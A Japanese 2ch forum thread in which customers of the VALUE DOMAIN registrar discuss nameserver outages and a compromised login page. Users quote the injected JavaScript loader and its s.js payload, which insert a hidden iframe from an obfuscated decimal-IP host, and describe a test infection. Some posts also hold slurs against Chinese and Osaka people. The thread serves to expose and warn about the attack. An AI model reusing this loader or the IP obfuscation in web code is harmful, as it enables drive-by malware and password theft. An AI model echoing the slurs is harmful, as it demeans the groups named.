VALUE DOMAINってどうよ？ part33

VALUE DOMAIN:バリュードメイン
https://www.value-domain.com/
サポート
https://www.value-domain.com/support.php
http://sb.xrea.com/forumdisplay.php?f=21

◆前スレ
VALUE DOMAINってどうよ？ part32
http://pc11.2ch.net/test/read.cgi/hosting/1239851317/

過去スレ
VALUE DOMAINってどうよ？ part31
http://pc11.2ch.net/test/read.cgi/hosting/1233882549/
VALUE DOMAINってどうよ？ part30
http://pc11.2ch.net/test/read.cgi/hosting/1225092250/
VALUE DOMAINってどうよ？ part29
http://pc11.2ch.net/test/read.cgi/hosting/1220946385/
VALUE DOMAINってどうよ？ part28
http://pc11.2ch.net/test/read.cgi/hosting/1214506719/

Q. VDが潰れたら俺のドメインどうなるの？

A.https://access.enom.com/
レジストラがeNomの場合はここでドメイン情報を操作できる
パスワードはVDの管理画面から取得できるのでメモしておくべし
Key Systems管理のドメインの場合は不明、eNomに移管した方が良いかも

補足
VDが健在の場合は定期的にVDに保存されている情報が上書きされる
またeNomで設定するにはネームサーバをeNom提供のものへ変更する必要があるので
VDのネームサーバを使ってる人は最長48時間程度のタイムラグが生じる可能性がある

詳細
http://sb.xrea.com/showthread.php?t=4836

Q. 汎用JPの場合はどうなるの？

A. JPNICと傘下のJPRSがちゃんと次の業者を指定してくれる
指定業者にするもよし、好きな業者を選ぶこともできる

実例
http://jprs.jp/info/termination/20060814.html

Q. というかVDって倒産するの？

A. XREAやCOREのサービスが不安定で2chでの評価は下がっているけどサーバは常にほぼ満員
以下のページによるとデジロック名義にしているドメインだけで14万個以上あり
単純に考えてドメイン販売だけで億単位の売り上げがある

http://whois.domaintools.com/xrea.com

VDが逝く前にしておきたいドメイン防衛（gTLDの場合）

・eNom管理にする
　→VDの管理画面にログインできないときは https://access.enom.com/ から操作可能

・Whoisのドメイン管理者のメールアドレスは独自ドメイン以外の連絡のつくアドレスにする
　→移管手続きの連絡は、ここで設定されたアドレスで行われる
　→迷惑メールフィルタのあるメールがよい

・いつでも他事業者に移管できるよう、ドメインロックは外しておく
　→ドメインロックがかかっていると移管手続きができないことがある

・認証鍵(Authorization Info)はメモ、あるいはメールで送ってもらう
　→移管手続きには必要。今のうちにVDの管理画面から取得しておく

　参考
　　ttp://sb.xrea.com/showthread.php?t=4836
　　ttp://kazamidori.net/kaoru/web/crisis/

前スレ保管庫
VALUE DOMAINってどうよ？ part32
http://mimizun.com/search/perl/dattohtml.pl?http://mimizun.com/log/2ch/hosting/pc11.2ch.net/hosting/kako/1233/12338/1239851317.dat
上記で読めないときは
http://www.geocities.jp/mirrorhenkan/url.html?u=http://pc11.2ch.net/test/read.cgi/hosting/1239851317/

はじめて正式スレを立てました。やったｗ

で、前の続きですが、
http://www.value-domain.com/login.php
午前4時30分ごろから、上のログインページにログインしようとすると、
ActiveXのインストールが実行しようとされていたのですが、
今はなおってますね。午前6時26分にActivX消えました。
なんだったのでしょうか。

実行元を調べると、以下だった↓
ttp://110.165.41.103:888/dir/m.htm
そして、そのIPを調べると・・・
http://safeweb.norton.com/report/show?url=110.165.41.103
↑ウイルスだーー！クラックされたかと思ったのだが、
なんだったのか・・・

症状がこっちで確認できんから何もと言えんな…
自分の環境の問題って訳じゃないよな？

環境の問題だけでログインページだけアクティブＸでるのって
初めてだ。そういうこともあるんですね。ノートンクイックスキャンで調べたら
Cookieが検出されただけだったけど。

VD・・潰れたら夜逃げってことないよな？
業務移管とかしないのかな・・。
どうせ止めるんだったら、
優秀な他の業者に業務移管して、さよならとしてほしいけど

>>10
今のうちに>>4を見て、
自分でできることはやっておこうぜ、兄弟!!

汎用JPは安心を買っていると思えば安いな

ns鯖は今日は7時くらいから調子いいじゃん珍しく

どうせそのうちまた(ry

いつも通り死んでますが？ｗ

現在、弊社の無料ネームサーバーが正常動作しないというご報告を多数いただいており、最優先業務として、担当部門がネームサーバー側の確認、および、接続回線(上位プロバイダーも含みます)の確認などの緊急対応を行っております。

この不具合のため、
　●独自ドメインへのアクセスが不安定
　●弊社サブドメインのアクセスが不安定
という症状が発生し、その結果、
　●メールが届いたり届かなかったりする
　●サイトにアクセスできたりできなかったりする
　●サーバーに設定しているドメインの設定が解除される
　●その他、サーバー、ドメインの各種不具合が発生する
という不安定な状況になっております。

また、直接的には無関係ではございますが、
　●レンタルカウンターの不具合
　●レンタルチャットの不具合
などの報告もいただいております。

現時点における回避策としましては、弊社以外のネームサーバー(転送有ドメインのenom社のネームサーバーも含みます)をご利用可能な場合は、そちらに切り替えていただくことになり、新たなDNS情報が浸透後(約24〜48時間の後)にご利用可能な状態になるものと思われます。
しかしながら、弊社の無料サーバーのみをご利用の場合は、誠に申し訳ございませんが、担当部門による本症状の解決をお待ちいただく形になります。
(特にネームサーバー関係の不具合につきましては、完全に正常化されました場合であっても、おおむね48時間以内に徐々に浸透して安定していく形になり、その間、接続が不安定になる場合もございます)


不安定な状態が続いており、ご不便をおかけしておりますことを改めてお詫び申し上げますと共に、
　━━━━━━━━━━━━
　━━━━━━━━━━━━
　●本ご回答から【7日間】改善をお待ちいただく
　●再度のご連絡は【7日経過後も改善しない場合】にいただく
　━━━━━━━━━━━━
　━━━━━━━━━━━━
という形でのご協力をお願い申し上げます。

↑ 前スレより転載


障害発生より一ヵ月以上経ちますがその後ご機嫌いかがですか社員さん

変わりなく過ごしております

対応出来る技術者を捜してる
↓
とりあえず直させる
↓
技術者逃亡
↓
また捜す　←今ここ

とっとと外注して復旧させろよ

外注は去年の広告鯖ウイルス混入事件で懲りてるんじゃない？
と言っても社内にそれなりの技術者いないなら外注しなきゃ仕方無いんだろうけど。

障害発生
↓
放置
↓
放置
↓
放置　←今ここ

もうこりゃ復旧は無理だろ 直せるもんならとっくに直ってるよ

食う
↓
寝る
↓
食う
↓
寝る
↓
100kg超え　←俺今ここ

>>24
運動しろｗｗ

>>6
ログインページ(SSL対応)にアクセスしたところ、
「SSLでないページが混在しています」のメッセージが出たのでおかしいなと思ったら、
ソースの326行目あたり、パスワード入力欄の下あたりに不審なJavaScriptが埋め込まれてるな

Googleキャッシュ(2009年7月3日 15:38:39 GMT)では上記のJavaScriptは存在しない
実際にウイルスかどうかは確認していないが、見た感じのソースは限りなくウイルス臭い

ガチ末期ですか？

なんかサポ板もバグってるみたいで収集つかなくなってるね

>>6

ttp://1856317799:888/s.js
のことかな
確かにパスーワード入力欄の下に埋め込まれてる

1856317799のIPアドレスは110.165.41.103
>>7
のIPと一致するけど、
正常なスクリプトか、ウイルスか、パス抜きか・・・

なんかよく分からんが、ログインするのはヤメとくか

なんだかなあ・・・
あっちもこっちもボロが出てるなぁ・・・

>>29
これか・・・
<ＳＣＲＩＰＴ ＬＡＮＧＵＡＧＥ＝"ＪＡＶＡＳＣＲＩＰＴ">
    ｖａｒ ｊｓ ＝ ｄｏｃｕｍｅｎｔ.ｃｒｅａｔｅＥｌｅｍｅｎｔ（"ｓｃｒｉｐｔ"）；
    ｊｓ.ｓｒｃ ＝ "ｈｔｔｐ：//１８５６３１７７９９：８８８/ｓ.ｊｓ"；
    ｔｒｙ ｛ｄｏｃｕｍｅｎｔ.ｇｅｔＥｌｅｍｅｎｔｓＢｙＴａｇＮａｍｅ（'ｈｅａｄ'）［０］.ａｐｐｅｎｄＣｈｉｌｄ（ｊｓ）；｝
    ｃａｔｃｈ（ｅｘｐ）｛｝
    ｊｓ ＝ ｎｕｌｌ；
</ＳＣＲＩＰＴ>

さっきログインしてしまった・・・orz

s.jsの中身

／＊ｄｓａｄａｓｄａｄａｓｄａｓｄａｓｄａｓ＊／
ｉｆ（ｄｏｃｕｍｅｎｔ．ｃｏｏｋｉｅ．ｉｎｄｅｘＯｆ（”Ｏ＝”）＝＝−１）
｛
　　　　ｖａｒ　ｊｓ　＝　ｄｏｃｕｍｅｎｔ．ｃｒｅａｔｅＥｌｅｍｅｎｔ（’ｉｆｒａｍｅ’）；
　　　　ｊｓ．ｓｒｃ　＝　”ｈｔｔｐ：￥／￥／０ｘ６ＥＡ５２９６７：８８８／ｄｉｒ／ｓｈｏｗ．ｐｈｐ”；
　　　　ｊｓ．ｗｉｄｔｈ＝０；
　　　　ｊｓ．ｈｅｉｇｈｔ＝０；
　　　　ｔｒｙ　｛ｄｏｃｕｍｅｎｔ．ｇｅｔＥｌｅｍｅｎｔｓＢｙＴａｇＮａｍｅ（’ｈｅａｄ’）［０］．ａｐｐｅｎｄＣｈｉｌｄ（ｊｓ）；｝
　　　　ｃａｔｃｈ（ｅｘｐ）｛｝
　　　　ｊｓ　＝　ｎｕｌｌ；

ｖａｒ　ｅｘｐｉｒｅｓ＝ｎｅｗ　Ｄａｔｅ（）；
ｅｘｐｉｒｅｓ．ｓｅｔＴｉｍｅ（ｅｘｐｉｒｅｓ．ｇｅｔＴｉｍｅ（）＋２４＊６０＊６０＊１０００）；
ｄｏｃｕｍｅｎｔ．ｃｏｏｋｉｅ＝”Ｏ＝Ｙｅｓ；ｐａｔｈ＝／；ｅｘｐｉｒｅｓ＝”＋ｅｘｐｉｒｅｓ．ｔｏＧＭＴＳｔｒｉｎｇ（）；
｝／＊ｄａｓｄａｄａｄｓａｄａｓｄａｓ＊／

何これpass抜きか何か？

http://safeweb.norton.com/report/show?name=110.165.41.103

Norton セーフウェブが 110.165.41.103 を分析して安全性とセキュリティの問題を調べました。下に示すのは見つかった脅威のサンプルです。

見つかった脅威の合計: 8

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d6.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/en.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d7.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d9.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/fd.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/wa.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/yg.dll

脅威名: Bloodhound.Exploit.193
場所: tp://110.165.41.103:888/swf/ia115-2.swf

このセキュリティの甘さは何なんだお？

完全に投げ出したか

俺のガマン汁もそろそろ限界だ。

これは
www.value-domain.com/
が乗っ取られたと解釈した方がいいのか？

wikiwikiもやられてるみたいだな。GENO系統だろ。
ここの管理者が感染してFTPパス抜かれたら被害すごいことになるんじゃね？

どうりで今日はデジロ社員が2ch工作してない訳だｗ
多分今頃、事務所は修羅場なんだろｗ

かんべんしてよマジで
IEだとデフォルトのセキュリティ設定で警告が出てくれるけど、Firefoxだと警告すら出ないから気がつかない

大丈夫かよデジロ

>>40
多分、社員はまだ気がついていないんじゃないかな
javascriptを削除するくらい数分でできるはず・・・社員がサーバーへのアクセス権限を失っていたら違う意味でやばいがね

もしパス抜かれてたら、パス変更したら大丈夫なの？

そもそも書き換えられたことが問題。

一時対応でとりあえずログインページは差し替えなきゃいけないだろ常考
差し替えたら取れなくなる資料は今のうちに取っておいて、
あとは原因追究、恒久的対応だろ

初心者的質問ですまんのだが、>>29にあるようなURLでどうして接続できるの？
あと、そのURLの謎の数字1856317799から、どうやってIPアドレスが辿れるの？
教えてエロい人。

とりあえず、マスコミに報告だ。

そうでもしなきゃ、隠蔽するだろ、ここ。

>>47
1856317799　=　0x6EA52967　=　110.165.41.0

すまん、

1856317799 = 0x6EA52967 = 110.165.41.103

か

0xの意味が理解できてないですけど、仕組みは分かりました。エロい人ありがとう。
ネット始めて10年にもなるのに、こんな表記の方法があるなんて恥ずかしながら知らなかったｗ
スレ汚し失礼しました。

こんな表記はスパムやウイルスのフィルターをかいくぐる目的以外では
まず使われないからな

>>51
なにしろマイクロソフトもうっかりしていて、IEの脆弱性になっていたくらいだからな。

0xではじまるのは16進数

ところで、ns1-3.value-domain.com がひけないんだが、俺だけ？

110.165.32.0/19は香港のアドレスブロックか
相変わらず中国人はクソ以下だな

ns2が引けないな。1と3は引ける

>>55
そんなのもう5月の終わりからだぞｗ

ネームサーバも酷いな、とりあえずenomにして
あとはポイントを全部延長して使い切ってから他へ逃げる準備しとく

しっかし、これだけ対応悪いと、
過去に隠蔽された情報漏洩やハッキング被害がｲﾊﾟｰｲあるのでは？と疑いたくなる。

とりあえず、ITMediaとGIGAZINEには、このスレを報告しといた。

GIGAZINE、期待してるよ。

>>51
1856317799 = 110*256^3 + 165*256^2 + 41*256 + 103

0xは16進数を表す. 256=0x100だから, 16進で表せば2桁ごとに分解できる：

0x6EA52967 → 0x6E 0xA5 0x29 0x67
0x6E = 110
0xA5 = 165
0X29 = 41
0x67 = 103

>>62
もういいって
ping 1856317799
とでも打てばすぐに分かることだし

惰性のみでM調教受け続けてきましたがさすがにもう無理です。
ごめんなさいドSデジロご主人様。

・・・ns1, ns2, ns3、すべてなにも帰ってこないぞ。

>>65

つ>>16

先月1日あたりからアナウンスも一切無くずっと放置だよ

とりあえず垢のパスは変えた方がいいのかな？どうなのかな？

おちおちコンパネにログインすらできんってどうよ
移管もできねーじゃん

>>66

これって死にッぱなし・・・じゃないよね？
だったらHPもメールも動かなくなるわけだし。

>>69
orz.2ch.ioとかの登録されているアドレスじゃないと何も返って来ないぞ。

知らずにログインしてた…
念のためJavaSciprt無効化してからログインしてパスワード変更したよ。

>>67
コンパネのパスを抜かれるって事はxreaのログイン情報から
メールのパスワードまで全部つながって見えるって事だから
とりあえず、JavaSciprtをoffにしてパスワードを変更した。

追加。
よく考えたらxreaどころじゃねぇ、
抜かれたパスワードからさらに他のパスワードに換えられたら、
こっちが何も出来ないまま、nsの変更どころかドメインを他人に移籍まで自由に出来るって事だ。
ログイン履歴をメモしておかないとな。
自分が寝ているハズの時間のログイン記録があるかもよ。

わざわざ今ログインしてる人って頭ＸＸＸＸＸ

改ざんされてる割には
あまり騒いでないな

JavaScriptを埋め込めるってことは、ログイン情報がポストされるPHPを改ざんすることも可能では？
つまり、JavaScriptを無効にしたところで、受け側のPHPの処理を信用できないのでログインは冒険だってことだ。
今はログインせずに、アナウンスを待つよりほかない。

他社で取得したco.jpドメイン運用しているんだけど、
NS1-3.VALUE-DOMAIN.COMを指定しちゃだめってこと？

まさか本当にGENO系？
それならvalue-domain.comのFTPパス抜かれたってことか
最悪だ

GENO系かどうかはわからないけど、login.phpが改竄されたってことは
少なくともftpの垢パスが漏れていると言う事実は変わらない。
もしかしたらもっと上位の垢パスの可能性だってある。

ログインにトロイ埋め込まれてて、香港のサーバになんか飛ばしてるのか
これ、どう処理するんだろ
適当にパスワード変更してください、って告知して、また１００日無料期間追加程度で終わるのかな

やばいよよばいよ

まだ直ってないの?

>>32のs.jsって本当にあるね……
俺、javascriptってよくわかんないんだけど、
ようするに、ログインしたら、ログインページのheadタグの後に、別のサーバのshow.phpってやつを差し込まれて何かされてるってこと？

この先いったいどうなることやら

http://www.value-domain.com/login.php

<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement("script");
js.src = "http://1856317799:888/s.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>


https://www.value-domain.com/login.php
<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement("script");
js.src = "http://1856317799:888/s.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>

当たり前だけ両方あるな

s.jsの中身

/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf("O=")==-1)
{
var js = document.createElement('iframe');
js.src = "http:\/\/0x6EA52967:888/dir/show.php";
js.width=0;
js.height=0;
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;

var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="O=Yes;path=/;expires="+expires.toGMTString();
}/*dasdadadsadasdas*/


http:\/\/0x6EA52967:888/dir/show.php
↓
http://110.135.41.103/dir/show.php

To: 85-86

>>31-32がなぜわざわざ全角にしたのか, >>34がなぜhttpでなくtpにしたのか,
考えてみよう.

>>85
>>86
既出
上で書いてあることをいちいち書き込まなくてよろしい
しかも香港鯖にリンクを貼るなや

ウィルスURLを張るのは普通に通報対象です

で、肝心のデジロは把握してるの？

把握していないのでは？
＜script＞〜＜/script＞を削除するくらい一瞬で終わる

誰かが魚拓とってくれたみたいだ。

ttp://s03.megalodon.jp/2009-0706-1843-51/https://www.value-domain.com/login.php

試しに問題のURLを確認してみた

問題の飛ばされる先のｍ.ｈｔｍに、ノーガードで突っ込んでみると、
XPだと、
ドライブ:/Documents and Settings/ユーザ名/Application Data
のフォルダの中に、a.exeというファイルがコピーされ、regeditいじってたら、気がついたら消えてた。実行されたのだろうか

詳細は不明
何かがやられているのは確かだ

実験するのは自己責任で

つーことは、ログインするとパスが抜かれるのではなく、
ログインページを開くだけで感染するってこと？

>>93に追記

ログをおったら、Keyloggerを検知した
やはりパスワード抜きで確定だと思う

要は　javascript 実行させない環境で見れば
問題ないのかな

普段はFireFox+ NoScriptで普段はjavascript
実行させないようにしてるけど・・・

>>95に追記

カスペルスキーを実行させながら再実験するとこんな感じになった
そんなスクリーンショット
ttp://www.dotup.org/uploda/www.dotup.org209036.jpg

これは酷い

login.phpに＜script＞を埋め込むことができるなら、
login.phpのログイン時の処理にも細工がしてある可能性もある

JavaScriptを無効にしていても、php内部の処理まではどうなっているのか分からないので、ログインしない方が無難

>>93
踏んだけどなかったなぁ
そもそもそのURL鯖落ちしてないか？

ttps://www.value-domain.com/login.php
にアクセスするだけで感染？

>>98
確かにそうだね
しかしそろそろドメインの更新できないと困る・・・

しかも他ではあんまり扱ってないドメインだから
移管するのも面倒だし

Windows以外のOSかVistaでアクセスした方がいいね

>>93 >>95 >>97だけど、こうなるのは本当に全くなにも対策してない場合だけだと思う。完全にXPをノーガードの素の状態で試したから
ちゃんと最新のセキュリティソフト入ってるなら大丈夫、だとは思う
カスペルスキーを立ち上げた状態でウイルスらしき実行ファイルやったら、なんか防いでるっぽかった。ブラウザがフリーズしたけど

ｍ．ｈｔｍのほうはこんな感じ、ｓｈｏｗ．ｐｈｐのほうは何も吐き出してこないから、何やってるか全く不明。

正直、なんともいえんけど、
とりあえず、実験に使ったPCは念を入れて、リカバリ中

>>101
ccTLDは基本的に移管できないよ
認証鍵があるtvは移管できるかもしれないけど

>>102
HDDはずしてubuntuをCD-ROMブートで使うのが
セキュリティ上いいのかしら(´・ω・｀)

Winのセキュリティソフトもすぐ対応してくれないと
意味ないし・・・

avastは検出してくれないなぁ〜
このキーロガーは、VDのパスを狙っているのではなく、
VD利用者が日頃入力するパスを狙ってるってことかな？

GENO系統ならフラッシュかPDFで感染させてFTPパスを抜いてそのパス使ってサイトの改竄する。

>>102
phpの内部処理まではサーバのほうで処理することでこっちはなにも見れないから、そこまで改ざんということなら、もうOS関係ないと思う
ログインすることそれ自体が危険

夕方ログインした
もう、手遅れだろうから
全部諦める事にしたよ
大規模な改ざんが来そうだね

ログイン出来なきゃサポにも連絡できねえ。
問題が大きくなる前に対処しないとやばいんじゃね？

今は消えてるみたい。やっと気づいたかな?
でも、相変わらず報告なしだなぁ

今北
何？ログインページにロガー仕込まれたの？マジで？？
今確認する分にはヘンなスクリプトは入ってなさげだけど…
マジで仕込まれていたなら事は重大だなあ

デジロは早急に今判っていることだけでもアナウンスすべき

本当だ、いつのまにかなくなってる
でも、>>92で魚拓もうとられてるし、これはさすがにアナウンス無しってことはないと思・・・・・・いたい
この期間にログインしてた人は、気がついたら自分のところ改ざんされてもおかしくないしな

社員がここを見て気づくというオチ

多分直接関係ないとはいえ、
お知らせ欄の「セキュリティ強化について」の文字が妙にむなしく感じる…

ユーザーが視認できるJavaScriptが削除されたにせよ、login.phpの内部処理が改竄されていたかどうかはユーザーには分からない。
一見対応されたかに見えても、プログラム内部の見えない部分まで確認したのかどうかは、VDのアナウンスを待つしかない。

login.phpが改竄されていたことには変わらない。
まだ危険は去っていないと考えるべきで、アナウンスがあるまでログインはおろか、
ttps://www.value-domain.com/login.php
を開くことも控えるべき

DNSくらいは別に他使えばよかったけど、これはさすがにやっちまったなぁ……
VDは前、サーバー復旧できなくてサーバ丸ごと初期化したこともあったけど、
今回の問題はどこまで被害がでてるかわからないから、それなみのクラスの問題だな

ふぅ、
とりあえずjs切ってパス変えて、あどべ関連も一応最新チェックしといた。

俳人（廃人）の俺がここで一句
面倒くせぇ　あぁ面倒くせぇ　面倒くせぇ

>>116
login.phpが書き換えられたというよりも、
login.phpから読み込まれる別のファイルなりデータベースなりが書き換えられてるような気がする。
ユーザー名、パスワード、挿入されたscriptタグが、同じ形に整えられてるからな。
よくあるSQLインジェクションみたいなもんじゃないかなー

改竄されていたのは login.php だけだったのか？
という疑問も残っている。

ログイン情報は、cookieに保存されるので、各ページのphpファイル内でcookieデータが送受信される。つーことは全phpファイルに改竄がなかったかチェックする必要がある。
どのページからでも情報漏洩の危険はあるってことだ。
さらに各phpファイルが内部でインクルードしていれば、そのファイルも全てチェックする必要がある。

このくらいできるよね＞VD社員

とりあえずサポートフォームから
「事は重大だから最低でも朝イチでアナウンスが欲しい」
っと送っておいた
質問カテゴリ＝利用前質問ならログイン無しでも送信できるしな
今の状況下でログインなんか怖くてできない

スレをちゃんと読まずに、>>72、>>118と同様、ログインしてパス変えてしまった

login.phpの内部処理が改竄されていた場合、ログインしたユーザーには
どんな被害があるの。whois情報が流出くらいならまだ許容できるんだけど

phpまでやられてたら、サーバでできることはほとんどなんでもできるよ

まあとにかく今は、VDの鯖がどの程度の被害を被ったのかアナウンスを待とうや

phpの内部処理が改竄されている可能性を考慮すると、
・JavaScriptをOFFにしてログインする
・以前のログイン情報がcookieに残っているユーザー（ログイン状態を維持しているユーザー）が、VDのサイトを開く

ってのも控えたほうがいいと思われる。

つまりアナウンスを見に行くのですら気を使う必要があるかもね
既存のcookieを削除してから訪問するとか、ブラウザを変えるとか・・・

＞アナウンスを待とうや

そのアナウンスが、素直に出てくるとでも思っているのかい？

んなこた知るか
当然すべきことを期待しているだけだ

通信法、個人情報保護法etc・・・VDがどこまで法を犯すのかというのも楽しみではあるがね

当然すべきことを期待しているだけだ（大爆笑）

たまたま見たらこんなことに・・・涙
ドメイン１００個以上使っているのでドビックリしてます。

>>128
何度目のビックリですか？

この程度でビックリしているようじゃここは使えませんよ

当然すべき事を意地でも徹底放置するのがデジロじゃないかｗ

なんでここって重大な障害等が発生してもいつも一切アナウンスしないの？

重大な障害じゃないんだよ。
ここでは鯖が1台どこかに消えちゃったとかが重大な障害

入金やカネに関する事はマメにアナウンスするのになｗ
逆に言うとそれ以外の事は一切アナウンスしないｗ

アナウンスしたら負けだと思っています

これから他の鯖屋工作員も加勢して、賑やかなスレになりそうだね。
ギガジンが記事にしたらもぅ、それこそ七夕祭りだな（ﾜﾗ

分かってない奴が多いねえ
鯖の障害をアナウンスしなかったこととは、チト違ってくる
法が絡むでのぉ

どんな法がどう絡んでくるの？
具体的にどうぞ。

いちいち聞くな、自分で調べろ
おっと、こーゆーときに「ググレカス」ってんだっけ

そんなわかりやすい逃げ打たれてもｗ
裏付けできないテキトーな事言うなって

規約にこんなこと書いてあるからVDはなにもしなくてもＯＫ
やるかやらないかはもはやVDの気分次第


VALUE DOMAIN サービス利用規約
　利用者は日本国内に在住で、且つ、日本語を理解できるものとします。

【責任の限界について】
　以下の事項に起因して発生する可能性のある損失について、
　当社及び上位レジストラは、利用者あるいは第三者に対して責任を負わないことに、
　利用者は同意するものとします。

●あらゆる原因によって起こるドメインネーム登録の未完了、不可、損失
●あらゆる非常事態が発生したことによる損失

ググレカスって
逃げ口上にも使えるんだなあ
　　　　　　　　　　　　　　　みつを

なんつーか、毎度のことながら、鯖がクラックされるって酷すぎだよな
また保守管理を委託してるシナ人の仕業なんじゃね？
あいつら、何度注意したって聞かねーし

次はどんなハード調教をしてくれるんだろうと更なる期待が高まる

次から次に、ここは何かとネタが尽きんなぁ・・・

今回の件すらアナウンスしないのなら引っ越しするかな

俺は特定のドメイン以外は2月の障害の時点で全部移管したよ。

どこに移管したんだよ

>>148
毎度ｗ

>▼2009.07.02
>セキュリティ強化について

率先して強化しなければならないセキュリティーを間違えてるだろｗ

>>31-32 の件ですが、msvidctl.dllの脆弱性です。
アドバイザリ出ました。
ttp://www.microsoft.com/japan/technet/security/advisory/972890.mspx
レジストリにkill bitを立てるか、以下の「Fix it」を押しましょう。
ttp://support.microsoft.com/kb/972890/

他にpdfとswfも併用されていますが、こちらは既知の脆弱性なので
AdobeReaderやFlashPlayerが最新バージョンであれば問題ありません。

現時点でもまだVDログインページは修正されてないの？

>>151
乙加齢臭

おはよう
朝起きたらサポートからの回答か3件も入っていてビビッた。いつものように放置だと思っていたのに。
コピペは控えるけど要約すると

・カスタマーサポート(受付部門)には「弊社担当部門（メンテ担当？）」からの報告が無い
・担当部門への申し送りは行う
・真偽確認＆アナウンスは担当部門の対応となる

ってところかな。一応、事の重大さは認識しているようだ。

気になるのは「担当部門からの報告がない」ってところ。
つまり、昨日深夜にスクリプトが外れたのは、VDの操作ではなく、
仕掛けた本人による操作の可能性もあるということだ。

正式アナウンスがあるまで、ログインは控えた方が良いな。

しかし、速報でも何でも、公式アナウンスは絶対しないんだｗ
ある意味潔いよねｗ デジロイズムｗ

いつも事あれば全て「担当部門(外注)」だな・・・

去年の広告鯖ウイルス混入の件の再来って感じだね

誰か高木先生にチクってよ

今wiki見たら前のウイルス事件の内容はいつの間にか記事削除されてるｗ
社員さんもそういう熱意を肝心なとこに向けてくれたらいいのにｗ

>>154
認識はいつも早いんだけど、その後放置でアナウンスせず黙殺だからいつもと変わらないのでは？
クレームにそういった内容の定型文を即返すって対応は従来通りだし

しかし、これくらいの修正すら即できない人間しか社内にいないのか？
外部丸投げがデフォでもちょっとひどすぎだろ

>>154
今回もやっぱり文末は
「騒がず黙って○週間待ってろカス共 ○週間の間は再度文句垂れてきてもシカトだからなコラ(意訳)」
な訳？

:::::::::::::::(>'A`)>　ｳﾜｧｧｧｧ　:::::::
:::::::::::::::( へへ :::::::::::::::::::::::::::::::::

今更ながら・・・







これはひどい

>>160
そーかもしれないけど、客としては待つしかないしなあ。
でも、俺も過去何度かサポートとやりとりしてるけど、深夜に送った奴に
深夜のウチに打ち返してきたのは初めてだったよ。

>>161
いや、見慣れたその定型文は今回は無いよ。

今回の件は顧客の財産（金やドメイン）に直接影響する問題なので
迅速かつ的確な対応をお願いしたいですな、VD様。

たしかにドメイン絡みで各種情報ぶっこ抜かれて改竄でも
やられたら洒落にならん。
ここで管理してるあと数個のドメインも、あと少しで移管可
になるんで全部移管したいが怖くてログインできん。

今はログインしても大丈夫？ まだ駄目？

今回、ログイン部分が改ざんされ個人情報が脅かされたわけだろ？

5000件以上の個人情報をデータベース等として所持し事業に用いている事業者は
必然的に個人情報取扱事業者に該当するんだよ。
該当する場合は個人情報保護法に乗っ取った運営をしなければならない。
今回、こういう被害受けたからには、デジロック側が個人情報保護法に基づき総務省に報告義務がある。
まさか登録者５０００件未満というわけでも無さそうだし。

それ以外にも、以前にも似たようなことがあったということから、
電気通信事業者としても注意義務違反にあたるかもしれない。
ここらへんは詳細わからないことには判断できないが。

とにかく、このまま放置で済む問題ではないのは確実だ。

何が入ってるかわからんからログインするな。

>>154
やっぱり、「担当部門」=「前回広告鯖をクラックしたシナ人」=「今回ログインフォームを改ざんした犯人」なんじゃね？
だから、デジロの中の人が真偽確認してもレスポンスが悪い、と

もう、大阪人は信用ならんなぁ

大阪は大阪民国法が適用されるから日本国の法律には準拠しないよ

なんかサポ板の挙動がおかしいのもこの改竄の件関係あるのかな？
それとも6月頭から完全放置のネームサーバ障害のせいかな？

これだけ被害だしといて、告知すらないとかありえないわ。
ウイルス配布元として訴えられてもしょうがないレベル

別にデジロック擁護する気はないけど、被害って言ってもまだ別に表立った実害って報告されてないでしょ？
徹底的に祭り上げられるか否かは今後の動向次第じゃないかな現時点では

速報なり何なりで即時何かしらの公式アナウンス出すべきだとは思うけどね
後に大事になった時に、認知しながらも被害拡大させた責任追及されて一番困るのはデジロックだろうから

て言うかまだ今の時点でログインページは改ざんされてるの？
どっちにしてもデジロが何もユーザーに対して説明しないと怖くてコンパネ入れないけど・・・

ここはいつも通り、自然治癒力に頼るしか方法はありません

どうせまた内部犯行だろ

技術者が逃げて外注に頼ってもお金が無くて素性の確かでない安いところに
頼んで乗っ取られたとかじゃない?

結局どうだったの？改竄はあったの？

GENOみたいな商売ならだんまりでも
「まあGENOだしな」で済むだろうけど
ここは腐っても鯖屋だぜ？
なるべく早急にまともな対応をしないと
冗談抜きに取り返しのつかないことになるかと

改ざんがあったかどうかなんて、ログくらいよめよ
90レス番台あたりとかに、全部のってるじゃん

デジロなんて、コアサーバーの殆どが児童ポルノサイト運営させて沢山あるくらいだしな
全く何とも思ってないよ

もしなんらかの損害が発生しても、
「あらゆる非常事態が発生したことによる損失」に対する責任は負いません
そういう規約ですから

login.php　を元に戻したのが誰かが分からない限り、ログインするのは危険。

デジロが対応したのなら、そのことを告知すべき、
公式告知がない＝仕掛けた奴が操作している可能性あり。すると、ログインは危険

待て…
よく考えるんだ…

これはトラブル続きで移管転出続出のデジロが仕組んだ逆転捨て身の移管防止策…！？

捨て身過ぎるだろｗ

ああそうか、鯖に安全宣言がなされてなければ、
じつはPOSTの受け取りを細工されてて、生パスが抜かれるかもしれんわけね

http://www.itmedia.co.jp/enterprise/articles/0907/07/news015.html

Windowsにゼロデイの脆弱性、サイト改ざん攻撃が多発

MicrosoftのVideo ActiveX Controlにゼロデイの脆弱性が発覚した。何千ものWebサイトが改ざんされ、閲覧しただけでマルウェアに感染する状態になっているという。

　MicrosoftのWindowsに影響する新たな脆弱性が見つかり、これを悪用したゼロデイ攻撃が発生している。Microsoftは7月6日、アドバイザリーを公開して注意を呼び掛けた。

